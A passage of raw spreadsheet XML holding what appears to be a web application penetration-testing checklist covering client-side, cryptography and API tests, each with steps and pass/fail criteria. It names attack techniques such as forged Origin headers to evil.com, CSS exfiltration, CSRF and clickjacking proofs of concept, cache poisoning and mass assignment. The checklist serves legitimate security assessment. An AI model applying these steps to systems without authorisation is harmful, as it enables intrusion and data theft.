Fail: Sensitive information that could compromise an account is found in localStorage or sessionStorage.</t>
  </si>
  <si>
    <t>CS-006</t>
  </si>
  <si>
    <t>JavaScript Execution Context</t>
  </si>
  <si>
    <t>To determine if scripts from different origins or privilege levels can influence each other, leading to security bypasses.</t>
  </si>
  <si>
    <t>1. Identify pages that use iframes or embed third-party scripts. 
2. Test if a script in one context (e.g., child iframe) can access or manipulate the DOM or variables of another context (e.g., parent page). 
3. Check for the use of proper sandboxing on iframes.</t>
  </si>
  <si>
    <t>Pass: Scripts from different origins are properly isolated and cannot interfere with each other. 
Fail: A script in a less-trusted context can access or manipulate a more-trusted context.</t>
  </si>
  <si>
    <t>CS-007</t>
  </si>
  <si>
    <t>CORS Misconfiguration</t>
  </si>
  <si>
    <t>To verify that the CORS policy does not improperly trust arbitrary origins, which could lead to data exfiltration.</t>
  </si>
  <si>
    <t>Burp Suite, cURL</t>
  </si>
  <si>
    <t>1. Send a request to an endpoint and provide an arbitrary Origin header (e.g., Origin: https://evil.com). 
2. Check if the Access-Control-Allow-Origin response header reflects the arbitrary origin. 
3. Check if Access-Control-Allow-Credentials is true with a reflected origin.</t>
  </si>
  <si>
    <t>Pass: The server only allows trusted domains in the Access-Control-Allow-Origin header. 
Fail: The server reflects an arbitrary Origin header or uses a wildcard (*) for authenticated endpoints.</t>
  </si>
  <si>
    <t>CS-008</t>
  </si>
  <si>
    <t>Clickjacking</t>
  </si>
  <si>
    <t>To ensure the application uses anti-clickjacking headers to prevent its pages from being rendered inside a malicious iframe.</t>
  </si>
  <si>
    <t>1. Inspect response headers for X-Frame-Options (DENY/SAMEORIGIN) or a Content Security Policy (frame-ancestors) directive. 
2. If missing, create a PoC HTML page that loads the target page in a transparent iframe to trick a user into clicking a button.</t>
  </si>
  <si>
    <t>Pass: The application uses either the X-Frame-Options header or a frame-ancestors CSP directive. 
Fail: The application page can be successfully loaded inside an iframe on an external domain.</t>
  </si>
  <si>
    <t>CS-009</t>
  </si>
  <si>
    <t>Client-Side Request Forgery</t>
  </si>
  <si>
    <t>To ensure that state-changing requests originating from client-side JavaScript (e.g., AJAX) are protected against CSRF.</t>
  </si>
  <si>
    <t>Burp Suite (CSRF PoC Generator)</t>
  </si>
  <si>
    <t>1. Identify a sensitive AJAX POST request. 
2. Check if the request includes an anti-CSRF token in a header or body. 
3. If not, create a PoC page that makes a cross-origin request to that endpoint. 
4. If the request succeeds, it is vulnerable.</t>
  </si>
  <si>
    <t>Pass: Sensitive client-side requests are protected by anti-CSRF tokens or SameSite cookies. 
Fail: A state-changing action can be triggered by a cross-origin JavaScript request.</t>
  </si>
  <si>
    <t>CS-010</t>
  </si>
  <si>
    <t>HTML Injection</t>
  </si>
  <si>
    <t>To test if user input is reflected on the page without proper encoding, allowing an attacker to inject arbitrary HTML tags.</t>
  </si>
  <si>
    <t>1. Identify an input field that is reflected in the page. 
2. Inject simple HTML tags like &lt;h1&gt;test&lt;/h1&gt;. 
3. Observe if the tags are rendered by the browser, breaking the page layout, or displayed as literal text.</t>
  </si>
  <si>
    <t>Pass: User input is properly HTML-encoded, and injected tags are displayed as text. 
Fail: Injected HTML tags are rendered by the browser, altering the page's content.</t>
  </si>
  <si>
    <t>CS-011</t>
  </si>
  <si>
    <t>Open Redirection</t>
  </si>
  <si>
    <t>To determine if the application redirects users to an external URL specified in a parameter without proper validation.</t>
  </si>
  <si>
    <t>Burp Suite, Redirect Bypasser</t>
  </si>
  <si>
    <t>1. Identify parameters that control navigation (e.g., ?next=). 
2. Change the parameter's value to an external domain. 
3. Test for bypasses if validation exists (e.g., using @ or URL encoding).</t>
  </si>
  <si>
    <t>Pass: The application only redirects to a whitelist of approved URLs or shows a warning. 
Fail: The application automatically redirects the user to an arbitrary, attacker-controlled website.</t>
  </si>
  <si>
    <t>CS-012</t>
  </si>
  <si>
    <t>CSS Injection</t>
  </si>
  <si>
    <t>To determine if user input can be injected into CSS selectors or style blocks, leading to UI redressing or data exfiltration.</t>
  </si>
  <si>
    <t>1. Find inputs that control style attributes or are reflected inside a &lt;style&gt; tag. 
2. Inject CSS payloads to alter the page's appearance. 
3. Attempt to use advanced CSS selectors and properties (@import, background-image) to exfiltrate data from the page.</t>
  </si>
  <si>
    <t>Pass: User input is correctly sanitized before being placed into a style context. 
Fail: Injected CSS is rendered by the browser, allowing page defacement or data exfiltration.</t>
  </si>
  <si>
    <t>CS-013</t>
  </si>
  <si>
    <t>Client-Side Resource Manipulation</t>
  </si>
  <si>
    <t>To verify that the application does not load client-side resources (e.g., JS libraries) from a user-controllable source.</t>
  </si>
  <si>
    <t>1. Analyze the page for &lt;script&gt; tags whose src attributes are dynamically generated from URL parameters. 
2. Attempt to change the parameter to point to an attacker-controlled script. 
3. Check if the browser loads and executes the malicious resource.</t>
  </si>
  <si>
    <t>Pass: All client-side resources are loaded from static, trusted URLs. 
Fail: The application loads a script or other resource from a user-controllable URL.</t>
  </si>
  <si>
    <t>CS-014</t>
  </si>
  <si>
    <t>Cross-Site Flashing</t>
  </si>
  <si>
    <t>To test if a legacy Flash application can be abused to execute JavaScript in the context of the main site.</t>
  </si>
  <si>
    <t>SWFScan, Burp Suite</t>
  </si>
  <si>
    <t>1. Identify any embedded Flash (.swf) objects. 
2. Decompile the object to check for insecure ExternalInterface.call() or getURL() functions. 
3. Craft a URL that passes a malicious JavaScript payload to the Flash object via flashvars.</t>
  </si>
  <si>
    <t>Pass: The application does not use Flash, or any Flash objects do not allow arbitrary JavaScript execution. 
Fail: An attacker can execute JavaScript by manipulating a vulnerable Flash object.</t>
  </si>
  <si>
    <t>CS-015</t>
  </si>
  <si>
    <t>Web Cache Poisoning</t>
  </si>
  <si>
    <t>To determine if an attacker can manipulate an intermediate web cache to serve a malicious response to other users.</t>
  </si>
  <si>
    <t>1. Identify cached responses (e.g., via X-Cache: HIT header). 
2. Find unkeyed inputs (HTTP headers like X-Forwarded-Host) that are reflected in the response. 
3. Craft a request that uses an unkeyed header to inject a payload (e.g., XSS) into the response. 
4. Confirm the poisoned response is served to others.</t>
  </si>
  <si>
    <t>Pass: The cache key includes all headers that can affect the response content. 
Fail: A crafted request causes a malicious response to be stored in the cache.</t>
  </si>
  <si>
    <t>CS-016</t>
  </si>
  <si>
    <t>Insecure Web Messaging</t>
  </si>
  <si>
    <t>To ensure the application's JavaScript correctly validates the origin of incoming messages from postMessage.</t>
  </si>
  <si>
    <t>1. Find message event listeners in the JavaScript code. 
2. Analyze the listener to see if it checks the event.origin property against a specific, trusted origin. 
3. If not, create a PoC page that sends a malicious postMessage to trigger a sensitive action.</t>
  </si>
  <si>
    <t>Pass: The message event listener strictly validates the origin of the sender. 
Fail: The listener processes messages from any origin, allowing a malicious page to abuse its functionality.</t>
  </si>
  <si>
    <t>CS-017</t>
  </si>
  <si>
    <t>Browser Storage Sensitive Data</t>
  </si>
  <si>
    <t>To find any sensitive data stored across all browser storage mechanisms, including IndexedDB and Web SQL.</t>
  </si>
  <si>
    <t>Browser Dev Tools (Application tab)</t>
  </si>
  <si>
    <t>1. Thoroughly use the application. 
2. Inspect all client-side storage areas: localStorage, sessionStorage, Cookies, IndexedDB, and Web SQL. 
3. Search for any PII, credentials, API keys, or session tokens.</t>
  </si>
  <si>
    <t>Pass: No sensitive data is stored in any client-side storage mechanism. 
Fail: Any data that could lead to account compromise or privacy violation is found in browser storage.</t>
  </si>
  <si>
    <t>CS-018</t>
  </si>
  <si>
    <t>WebSocket Security</t>
  </si>
  <si>
    <t>To identify security flaws in WebSockets, such as cross-site WebSocket hijacking or lack of input validation.</t>
  </si>
  <si>
    <t>Burp Suite, Simple Web Sockets Client</t>
  </si>
  <si>
    <t>1. Check if the connection is secure (WSS). 
2. Test if the server validates the Origin header during the handshake to prevent cross-site hijacking. 
3. Send malformed or malicious data (e.g., XSS, SQLi payloads) through the socket to test server-side validation.</t>
  </si>
  <si>
    <t>Pass: WebSockets use WSS, validate the origin, and properly sanitize all data received. 
Fail: The connection is insecure (WS), origin is not checked, or the server processes malicious payloads.</t>
  </si>
  <si>
    <t>Phase 10: Client-Side Testing</t>
  </si>
  <si>
    <t>CRYPTO-001</t>
  </si>
  <si>
    <t>Weak SSL/TLS Configuration</t>
  </si>
  <si>
    <t>To verify the server is configured to use strong TLS protocols, ciphers, and key exchange mechanisms.</t>
  </si>
  <si>
    <t>SSL Labs, Nmap, testssl.sh</t>
  </si>
  <si>
    <t>1. Scan the server's public-facing ports (e.g., 443) with an automated TLS scanner. 
2. Check for support of deprecated protocols like SSLv3, TLS 1.0, and TLS 1.1. 
3. Enumerate all supported cipher suites and check for weak ones (e.g., RC4, 3DES, NULL ciphers).</t>
  </si>
  <si>
    <t>Pass: Only TLS 1.2 or higher is enabled with strong, modern cipher suites. 
Fail: Support for SSLv3/TLS 1.0/1.1 is enabled, or weak cipher suites are supported.</t>
  </si>
  <si>
    <t>CRYPTO-002</t>
  </si>
  <si>
    <t>Sensitive Data Over Unencrypted Channels</t>
  </si>
  <si>
    <t>To ensure that all sensitive data, including credentials and session tokens, is transmitted exclusively over an encrypted channel (HTTPS).</t>
  </si>
  <si>
    <t>Wireshark, Burp Suite, Browser Dev Tools</t>
  </si>
  <si>
    <t>1. Configure a proxy or network sniffer to monitor all application traffic. 
2. Log in and use all application features. 
3. Inspect captured traffic to confirm that no requests containing credentials or session tokens are sent over plain HTTP.</t>
  </si>
  <si>
    <t>Pass: All sensitive data and session tokens are transmitted only over HTTPS. 
Fail: The login form submits over HTTP, or any session cookie is transmitted without the Secure flag.</t>
  </si>
  <si>
    <t>CRYPTO-003</t>
  </si>
  <si>
    <t>Insecure Password Storage</t>
  </si>
  <si>
    <t>To verify that the application stores user passwords using a strong, salted, one-way hashing algorithm.</t>
  </si>
  <si>
    <t>Code Review, Database Inspection</t>
  </si>
  <si>
    <t>1. Register two accounts with the same password. 
2. If database access is possible, inspect the stored password hashes; they should be different. 
3. Review the source code to identify the hashing algorithm used (e.g., bcrypt, Argon2).</t>
  </si>
  <si>
    <t>Pass: Passwords are hashed using a modern, slow algorithm (e.g., Argon2, bcrypt) with a unique salt per user. 
Fail: Passwords are stored in plaintext, are reversibly encrypted, or are hashed with a weak algorithm (e.g., MD5, SHA1).</t>
  </si>
  <si>
    <t>CRYPTO-004</t>
  </si>
  <si>
    <t>Predictable Random Number Generation</t>
  </si>
  <si>
    <t>To ensure that cryptographically sensitive tokens (e.g., session IDs, CSRF tokens) are generated with sufficient randomness to be unpredictable.</t>
  </si>
  <si>
    <t>1. Request and collect a large sample (at least 100) of a specific token from the application. 
2. Load the collected tokens into a statistical analysis tool. 
3. Analyze the results for entropy, character distribution, and any discernible patterns.</t>
  </si>
  <si>
    <t>Pass: The tokens are shown to have a high level of entropy and are statistically random. 
Fail: The tokens exhibit a pattern, have low entropy, or are based on predictable values.</t>
  </si>
  <si>
    <t>CRYPTO-005</t>
  </si>
  <si>
    <t>Use of Deprecated Hash Algorithms</t>
  </si>
  <si>
    <t>To identify any use of weak or deprecated hashing algorithms (e.g., MD5, SHA1) for integrity checks or other security functions.</t>
  </si>
  <si>
    <t>Burp Suite, Code Review</t>
  </si>
  <si>
    <t>1. Intercept application traffic and look for parameters that appear to be hashes for integrity checks. 
2. Attempt to generate a known weak hash (e.g., MD5 of "test") and see if it is used by the application. 
3. Review source code for cryptographic functions using MD5 or SHA1.</t>
  </si>
  <si>
    <t>Pass: All hashing functions use modern, collision-resistant algorithms like SHA-256 or stronger. 
Fail: MD5 or SHA1 is used for any security-sensitive purpose like integrity checks or certificate signatures.</t>
  </si>
  <si>
    <t>CRYPTO-006</t>
  </si>
  <si>
    <t>Missing Encryption of Sensitive Data at Rest</t>
  </si>
  <si>
    <t>To verify that sensitive data stored by the application (e.g., in databases or files) is securely encrypted.</t>
  </si>
  <si>
    <t>Database Client, File System Analysis</t>
  </si>
  <si>
    <t>1. Gain access to the application's back-end storage. 
2. Identify tables or files containing PII, financial data, or credentials. 
3. Examine the stored data to confirm it is encrypted and not in plaintext.</t>
  </si>
  <si>
    <t>Pass: All sensitive data at rest is encrypted using strong, industry-standard algorithms. 
Fail: Sensitive data is stored in plaintext or with weak/deprecated encryption in the database or on the file system.</t>
  </si>
  <si>
    <t>CRYPTO-007</t>
  </si>
  <si>
    <t>Padding Oracle Vulnerability</t>
  </si>
  <si>
    <t>To determine if the application's handling of cryptographic padding errors allows an attacker to decrypt ciphertext.</t>
  </si>
  <si>
    <t>PadBuster, Burp Suite</t>
  </si>
  <si>
    <t>1. Identify an input (e.g., a cookie) that contains encrypted data. 
2. Systematically tamper with the bytes of the encrypted ciphertext. 
3. Send the modified ciphertext to the server and observe if its error responses are different for bad padding vs. other crypto errors.</t>
  </si>
  <si>
    <t>Pass: The application returns a generic error message regardless of whether the padding is valid or not. 
Fail: The application's error responses differ based on the padding's validity, allowing an oracle to be built.</t>
  </si>
  <si>
    <t>CRYPTO-008</t>
  </si>
  <si>
    <t>Use of Weak Encryption Algorithms or Keys</t>
  </si>
  <si>
    <t>To ensure that all data encryption uses strong, modern algorithms with appropriate key lengths and secure key management.</t>
  </si>
  <si>
    <t>Code Review</t>
  </si>
  <si>
    <t>1. Review source code to identify all cryptographic libraries and functions used. 
2. Check for the use of weak algorithms (e.g., DES, RC4) or insufficient key sizes (e.g., RSA &lt; 2048 bits). 
3. Search for hardcoded cryptographic keys within the source code or configuration files.</t>
  </si>
  <si>
    <t>Pass: All encryption uses strong, vetted algorithms (e.g., AES-256) with securely managed, high-entropy keys. 
Fail: The application uses deprecated algorithms, insufficient key sizes, or hardcoded keys.</t>
  </si>
  <si>
    <t>Phase 11: Weak Cryptography Testing</t>
  </si>
  <si>
    <t>API-001</t>
  </si>
  <si>
    <t>REST API AuthN &amp; AuthZ</t>
  </si>
  <si>
    <t>To verify that every API endpoint correctly enforces authentication and authorization controls, preventing anonymous access and privilege escalation.</t>
  </si>
  <si>
    <t>Burp Suite, Postman, OWASP ZAP</t>
  </si>
  <si>
    <t>1. Make an unauthenticated request to a protected endpoint and expect a 401/403 error. 
2. Authenticate as a low-privileged user and attempt to access an endpoint reserved for high-privileged users. 
3. Test token handling, checking for weaknesses and secure transmission.</t>
  </si>
  <si>
    <t>Pass: All protected endpoints require a valid token, and users can only access resources permitted by their role. 
Fail: An endpoint is accessible without authentication, or a user can access another user's data or higher-level functions.</t>
  </si>
  <si>
    <t>API-002</t>
  </si>
  <si>
    <t>SOAP XML Injection</t>
  </si>
  <si>
    <t>To determine if user-supplied input can manipulate the structure or content of the back-end XML document in a SOAP request.</t>
  </si>
  <si>
    <t>Burp Suite, SoapUI</t>
  </si>
  <si>
    <t>1. Identify user-controllable data within a SOAP request body. 
2. Inject XML metacharacters (e.g., &lt;,&gt;,') to check for parsing errors. 
3. Attempt to inject valid XML structures to alter the logic of the SOAP call (e.g., test for XXE).</t>
  </si>
  <si>
    <t>Pass: The application correctly sanitizes or rejects malformed XML input, and the SOAP call's logic is not altered. 
Fail: Injected XML alters the query's structure, causes an error that leaks information, or leads to XXE.</t>
  </si>
  <si>
    <t>API-003</t>
  </si>
  <si>
    <t>GraphQL Introspection &amp; Configuration</t>
  </si>
  <si>
    <t>To identify common GraphQL misconfigurations such as introspection being enabled in production or verbose error messages.</t>
  </si>
  <si>
    <t>GraphQL Voyager, InQL, Burp Suite</t>
  </si>
  <si>
    <t>1. Send a standard introspection query to the GraphQL endpoint. 
2. Trigger an error with a malformed query and inspect the response for excessive detail (stack traces, debug info). 
3. Check if query suggestions are enabled in production.</t>
  </si>
  <si>
    <t>Pass: Introspection is disabled on production environments, and error messages are generic. 
Fail: The full GraphQL schema is exposed via introspection, or errors reveal internal server details.</t>
  </si>
  <si>
    <t>API-004</t>
  </si>
  <si>
    <t>Insecure API Rate Limiting</t>
  </si>
  <si>
    <t>To verify that the API enforces rate limits on sensitive or resource-intensive endpoints to prevent brute-force attacks and denial of service.</t>
  </si>
  <si>
    <t>Burp Suite Intruder, ffuf</t>
  </si>
  <si>
    <t>1. Identify a sensitive endpoint (e.g., login, password reset, OTP generation). 
2. Use an automated tool to send a high volume of requests to the endpoint in a short period. 
3. Observe if the server begins to block requests (e.g., with a 429 Too Many Requests status code).</t>
  </si>
  <si>
    <t>Pass: The API effectively throttles or blocks requests after a defined limit is reached. 
Fail: The API allows an unlimited number of requests, enabling brute-force or resource exhaustion attacks.</t>
  </si>
  <si>
    <t>API-005</t>
  </si>
  <si>
    <t>API Mass Assignment</t>
  </si>
  <si>
    <t>To determine if an API endpoint allows an attacker to modify sensitive object properties by adding them to the JSON/XML request body.</t>
  </si>
  <si>
    <t>Burp Suite, Postman</t>
  </si>
  <si>
    <t>1. Identify an endpoint that updates a data object (e.g., PUT /api/v1/users/me). 
2. Guess sensitive, non-public property names (e.g., role, isAdmin). 
3. Add these properties to the request body (e.g., {"username":"test", "isAdmin":true}). 
4. Check if the properties were successfully updated.</t>
  </si>
  <si>
    <t>Pass: The API back-end ignores any non-whitelisted properties in the request body. 
Fail: The API modifies sensitive object properties based on the malicious data supplied by the user.</t>
  </si>
  <si>
    <t>API-006</t>
  </si>
  <si>
    <t>Broken Object Level Authorization (BOLA/IDOR)</t>
  </si>
  <si>
    <t>To verify that the API validates that a user is authorized to access a specific object they have requested.</t>
  </si>
  <si>
    <t>Burp Suite (Autorize), Postman</t>
  </si>
  <si>
    <t>1. Log in as User A and request a resource they own (e.g., /api/orders/123). 
2. Log in as User B. 
3. As User B, replay the request for User A's resource (/api/orders/123). 
4. Check if the API grants access.</t>
  </si>
  <si>
    <t>Pass: The API returns an authorization error (e.g., 403 Forbidden) when User B requests User A's object. 
Fail: The API grants User B access to view, modify, or delete User A's object.</t>
  </si>
  <si>
    <t>API-007</t>
  </si>
  <si>
    <t>Broken Function Level Authorization</t>
  </si>
  <si>
    <t>To ensure that users cannot access API functions or administrative endpoints that are outside their intended permissions.</t>
  </si>
  <si>
    <t>Burp Suite, kiterunner</t>
  </si>
  <si>
    <t>1. Authenticate as a standard, non-administrative user. 
2. Attempt to call API endpoints intended only for administrators (e.g., POST /api/admin/users, DELETE /api/users/123). 
3. Try changing the HTTP method to access restricted functionality.</t>
  </si>
  <si>
    <t>Pass: The API returns a 403 Forbidden or similar error for all attempts to access unauthorized functions. 
Fail: A low-privileged user can successfully execute a high-privileged API function.</t>
  </si>
  <si>
    <t>API-008</t>
  </si>
  <si>
    <t>GraphQL Denial of Service</t>
  </si>
  <si>
    <t>To test if the GraphQL API is vulnerable to denial of service by processing overly complex or deeply nested queries.</t>
  </si>
  <si>
    <t>GraphQL IDE (GraphiQL), Burp Suite</t>
  </si>
  <si>
    <t>1. Using the schema, identify objects that have relationships to each other. 
2. Craft a deeply nested query that repeatedly calls these relationships (e.g., user { posts { comments { author { posts ... } } } }). 
3. Send the query and monitor the server's response time and resource usage.</t>
  </si>
  <si>
    <t>Pass: The API implements query depth limiting, query cost analysis, or timeouts to prevent resource exhaustion. 
Fail: The complex query causes the server to become slow or unresponsive.</t>
  </si>
  <si>
    <t>Phase 12: API Testing</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1. Use advanced Google search operators (e.g., </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
      </rPr>
      <t>site:target.com filetype:log</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>). 2. Analyze results for exposed logs, backups, or admin portals. 3. Verify accessibility of discovered resources.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pass:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> No sensitive or internal files appear in public search results. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Fail:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Sensitive data or admin portals are indexed and accessible.</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1. Send HTTP requests and analyze headers (e.g., </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
      </rPr>
      <t>Server:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>). 2. Run fingerprinting tools to identify the server and framework. 3. Validate results with version-specific research.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pass:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Server hides or obfuscates version info. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Fail:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Server and framework details are exposed.</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1. Access </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
      </rPr>
      <t>/robots.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
      </rPr>
      <t>/sitemap.xml</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
      </rPr>
      <t>/security.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>. 2. Review entries for disallowed paths or sensitive URLs. 3. Document findings that expose restricted areas.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pass:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Files contain only non-sensitive entries. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Fail:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Files reveal internal directories or admin paths.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pass:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Only intended applications are accessible. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Fail:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Hidden, outdated, or test applications are found.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pass:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> No sensitive data in comments or metadata. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Fail:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Credentials or internal references are exposed.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pass:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> All input points identified and secured. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Fail:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Hidden input vectors or unvalidated fields discovered.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pass:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Application follows defined, secure flow. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Fail:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Unintended navigation or access paths identified.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pass:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Minimal fingerprinting information revealed. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Fail:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Technology stack and versions fully exposed.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pass:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Architecture follows least-privilege and segmentation principles. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Fail:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Sensitive components share unsecured communication paths.</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1. Fetch response headers via </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
      </rPr>
      <t>curl -I</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>. 2. Verify presence of HSTS, CSP, X-Frame-Options, X-Content-Type-Options. 3. Document missing or misconfigured headers.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pass:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> All major security headers implemented correctly. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Fail:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Critical headers missing or misconfigured.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pass:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Framework info minimized or hidden. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Fail:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
